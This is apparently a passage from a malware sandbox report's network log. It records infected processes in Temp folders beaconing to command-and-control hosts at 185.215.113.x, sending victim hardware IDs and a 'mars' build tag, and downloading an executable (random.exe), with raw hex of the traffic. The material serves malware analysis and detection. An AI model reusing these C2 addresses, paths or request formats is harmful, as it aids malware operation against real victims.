Nov 12, 2024 00:07:38.841252089 CET	1236	IN	Data Raw: bb 6f 2c d6 7d 57 46 6f b5 48 e2 ee 25 ad 9d d2 61 ff 38 89 45 89 d8 8c 1d 9f c4 6b 1c 8f a2 60 4d 87 53 73 35 9f fb 8f b3 87 6f 91 6d ef 2c 80 44 91 79 20 33 db e1 01 d7 d3 41 21 d6 c2 d8 3f 7b 8b c8 18 7c c8 c0 98 d4 84 35 88 63 5b 26 da d2 8d Data Ascii: o,}WFoH%a8Ek`MSs5om,Dy 3A!?{\|5c[&y`n( 2(D}+@%<AVY:g$7}cRes=_}b*@/f]73_A 0~S({fIM_F&/{`8
Nov 12, 2024 00:07:38.841263056 CET	636	IN	Data Raw: 36 6a 13 a3 76 9e cf 38 cf e3 96 9f 2d 99 8f 9d 8b 1c 3c 5f 8d 52 00 00 35 0a 60 87 91 57 18 1c cd 90 c5 f4 70 ca 02 03 6d 8b 1a 90 18 81 8c 11 b2 b9 24 92 99 52 c7 61 b1 c2 ac 84 71 2b 21 db 8d 5d bc 09 6b bd 88 a9 e1 c7 e3 62 21 93 d6 5a 63 d8 Data Ascii: 6jv8-<_R5`Wpm$Raq+!]kb!ZcfHCwG+}@:;uJ];\|vLO~f2p"RwXG\|"1]r]Rc5JbS3pz,K8)H;?^ "=}&4&yZhho'6c
Nov 12, 2024 00:07:38.841350079 CET	1236	IN	Data Raw: 41 93 01 a7 e9 9b 5b 9a 51 bf d9 44 c4 42 17 15 7d 9b 77 91 2e 6c 96 fa 21 a5 c7 47 51 c6 c9 a7 3f 66 12 47 6c 16 c3 95 fd b3 d8 68 7b 1b 3c c2 58 15 5b 72 78 b5 86 ab 1f 94 50 38 14 33 f2 a3 1f 94 b6 20 2b 7b e9 db 46 2a 75 62 64 a3 27 eb 15 1a Data Ascii: A[QDB}w.l!GQ?fGlh{<X[rxP83 +{F*ubd'eAtI <G:WYC^FiL@K73GZ5WJM>AcgPLP9:5]X2?WA<GR<c7GQ>ynie\|I
Nov 12, 2024 00:07:38.841376066 CET	1236	IN	Data Raw: f4 5e 12 96 09 81 21 67 35 5b 96 01 af 45 12 c0 93 c5 9c 89 89 b6 24 24 30 0d 37 36 5e 36 2d a7 35 1b a0 dd b9 9e 20 91 bd 36 2d 1b 36 1f 74 85 53 85 1d 2f c6 9f 2a ff 7f bf 92 7d 85 75 9b e8 4c d3 18 db 9c bb de 98 3f c8 50 13 4c cb 3e 37 4d bb Data Ascii: ^!g5[E$$076^6-5 6-6tS/}uL?PL>7MAp$Y,f94KfwKv2wKUpQ8MlGe?5Cxs!G#S,SSaUqOMApQ>p^8R#;re
Nov 12, 2024 00:07:38.841387033 CET	1236	IN	Data Raw: 72 9f 82 79 75 81 2c 63 86 be e1 81 25 b5 33 ac 31 1e 87 d5 7f 5c 2e 50 a3 8f de 81 1d 86 3c d0 11 a2 13 65 9e 1d 3b 88 4d a7 98 d4 79 8b ea dd 60 af 2a 87 79 13 67 1f 78 91 dd d3 8d b5 e8 87 c1 1d 9b 20 34 29 75 dc 5d 8a 2a f0 49 47 f1 78 07 81 Data Ascii: ryu,c%31\.P<e;My`ygx 4)u]IGxo16v4(gg-ub!-wG;mD'\|w+G-?,1E%zBUKW>7L/LaKqQK
Nov 12, 2024 00:07:38.846252918 CET	1236	IN	Data Raw: 4d 03 9b 7d 90 5e 4d 74 34 95 2a cb 4c 98 19 b9 35 f0 c5 df 4b 9f 44 1d b7 ee 1d 88 00 07 c1 80 0d bd 4d 67 48 ff 7f 9c a3 b6 f3 07 ce 8c 3d 8b 79 97 e3 9c 2f b6 c5 85 3f 81 c4 24 1a 20 ea 65 7b e7 9c 89 e5 b6 cc 1e 30 09 34 84 fc a9 2f 9f 91 5d Data Ascii: M}^Mt4*L5KDMgH=y/?$ e{04/]zL[N6-5o"Su1\LtZ60oPETRhjb}RwL!omfiUi>d&G!7Rq9EJ7&ux9<Y3-@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50302	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:40.129997969 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:40.778537989 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50305	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:42.391834974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:43.034147978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50307	185.215.113.206	80	8836	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:44.569722891 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:07:45.239322901 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:07:45.241846085 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
Nov 12, 2024 00:07:45.449898958 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50308	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:44.621764898 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:45.263906956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50310	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:47.172724009 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:47.810125113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50314	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:49.330022097 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:49.987231970 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50315	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:51.649507046 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:52.276743889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50317	185.215.113.16	80	9108	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:53.301817894 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 12, 2024 00:07:53.896280050 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:53 GMT Content-Type: application/octet-stream Content-Length: 1815040 Last-Modified: Mon, 11 Nov 2024 22:52:56 GMT Connection: keep-alive ETag: "67328ac8-1bb200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"i@ifX@M$a$ $b@.rsrc $r@.idata $r@ *$t@xxdbzcjj Ov@txsnlhpzi@.taggant0i"@
Nov 12, 2024 00:07:53.896301985 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:53.896313906 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:53.896326065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:53.896337986 CET	1236	IN	Data Raw: 49 ff 54 8c d5 da 21 06 1e 6e ed 0f 97 47 c6 14 49 40 ef 27 5b 25 0b 65 35 46 aa 21 7f ff 38 18 66 df 8b 00 80 3a 9c 26 c0 70 2a d1 4e 43 e0 78 fd e9 e8 f0 35 42 04 bd 3c 5f ee 44 90 4f f4 b5 bd 0c 0f c0 c5 28 93 44 d1 f2 e5 27 b5 69 d8 9f 3d 57 Data Ascii: IT!nGI@'[%e5F!8f:&p*NCx5B<_DO(D'i=Wb}xM1kqo'OxTcEh>R[~P$&MHrLPiR?R0f=y%6a1po,}WFoH%a8
Nov 12, 2024 00:07:53.896349907 CET	1236	IN	Data Raw: 4f fe e3 65 d4 47 ce bd 57 d2 75 82 8a ba 9d 2e 4c 55 ac f6 14 27 a8 ed 55 04 7b 2d fd 56 10 9f e7 54 16 0c c0 33 fe be 88 e5 ee 44 7e 75 42 9d 7a 7a 11 0f 95 a5 10 47 9a f2 21 ad bf 9d fb 35 8b c8 ae b3 31 fe f2 d8 7c d3 51 5b 35 f3 78 d0 74 9c Data Ascii: OeGWu.LU'U{-VT3D~uBzzG!51\|Q[5xt$udCnv:l6G4M)N1/.Mbv? NDN'GoB?BpfQdpk!`4 Q\{;E[!Qg6jv8-<
Nov 12, 2024 00:07:53.896363020 CET	1236	IN	Data Raw: 35 8f cf d9 ac bf 70 dc 7f af 16 9f 55 bf 2a 87 29 13 1f 1d 76 b5 c1 9d 55 57 18 db b9 47 58 dc 31 1c 20 1c 86 ac de 80 79 19 10 21 44 9f 17 bf 65 53 9c 76 59 86 60 d7 4b 92 f8 07 ba 55 a8 71 8d 86 56 d5 ba 9f 2c bf 9d 53 48 75 e5 13 28 e0 78 7d Data Ascii: 5pU)vUWGX1 y!DeSvY`KUqV,SHu(x}.!36L(`)u!?y K7S.-_5!UBRS~261?KH)A^KoO,EA\GY,L86(o56UL+!m
Nov 12, 2024 00:07:53.896374941 CET	1236	IN	Data Raw: 39 4c 61 8c b0 78 59 73 4f a3 9e 82 39 19 3f 5e 1a d5 5b c7 b3 81 50 13 be 1c db ec 79 8c 9c b2 35 81 a4 dd 69 9f e8 0a 75 92 e2 ef 35 81 58 d3 09 b5 99 78 ba 53 13 13 8f 9f 29 3f 60 0b 98 7c 6d 41 d6 6f e5 81 18 87 18 1f c7 1b ce 4d ac 4e 4d bf Data Ascii: 9LaxYsO9?^[Py5iu5XxS)?`\|mAoMNM=!>{U}K2&G<{EG`y:}xDDKvF~w&'\|$sHu]K,ls9>\|B~r*uaw8
Nov 12, 2024 00:07:53.896385908 CET	1236	IN	Data Raw: 5e 34 2d e3 1f db 11 05 4a b5 9b e5 b5 ca 29 87 fd 13 bb 25 76 6e 94 be 11 3b cf 18 7e 33 16 91 1d 66 7b 80 57 b2 a0 c8 4b 54 a8 76 b5 55 d5 63 33 6d 18 81 0d 58 f8 1d ce a0 aa 9e 08 f7 2a 87 e9 1d 3b a0 48 b6 59 13 36 a2 d2 8f ac bf b8 d6 11 9c Data Ascii: ^4-J)%vn;~3f{WKTvUc3mX;HY6}D=Mp>$`ug*xY7Ud'<Z/G:<KQq>aW!D>+F$L5?jkKR9oh$0.i$)3;KC@
Nov 12, 2024 00:07:53.896397114 CET	1236	IN	Data Raw: 48 d5 3d 95 4b 83 dd 73 a5 b5 c0 85 5d 0c 37 dc b4 a3 de 81 51 86 36 83 bb 45 2d 05 36 47 c4 8e 75 1f 7b 83 77 94 8e d1 89 13 2f b3 78 34 33 9c 12 ec 1e 1b 4a 63 a1 82 bd 9f 98 dc b7 f2 9c 80 3a 7f 94 18 ca 55 68 1f 1a d8 3e 83 b5 f5 2a 87 a9 13 Data Ascii: H=Ks]7Q6E-6Gu{w/x43Jc:Uh>v.OOu8C`Rb!QO?KzLEK6JR;UFdWtDdK/9k/Mw~I;x<!A<66
Nov 12, 2024 00:07:53.901190996 CET	1120	IN	Data Raw: f1 16 aa ec b7 87 ed 17 eb 8e 68 8e fd 47 3d f4 17 67 f0 9c 15 96 c0 32 74 36 d3 21 22 c6 af 6d 1d cc b6 72 5d 61 dc 71 a2 0e 81 93 b0 62 68 65 80 e3 c0 27 1d 95 b1 f1 43 e4 d5 4b 1e 84 cc 6e 69 3e 96 25 7c cf c3 21 35 3b 27 34 42 4f 98 eb b1 33 Data Ascii: hG=g2t6!"mr]aqbhe'CKni>%\|!5;'4BO3-';%)!##qIT= sQIcLQXId$^rC5u\j'LVf#%rTr\,B$k? Cjuy8+S#r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50318	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:53.831414938 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:54.465353012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50319	185.215.113.206	80	2124	C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:55.300616980 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:07:55.914886951 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:07:55.917241096 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEG Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 2d 2d 0d 0a Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="build"mars------FIDGHIIECGHDHJKFCAEG--
Nov 12, 2024 00:07:56.119226933 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50320	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:56.079796076 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:56.718206882 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50321	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:58.325586081 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:59.068454027 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50322	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
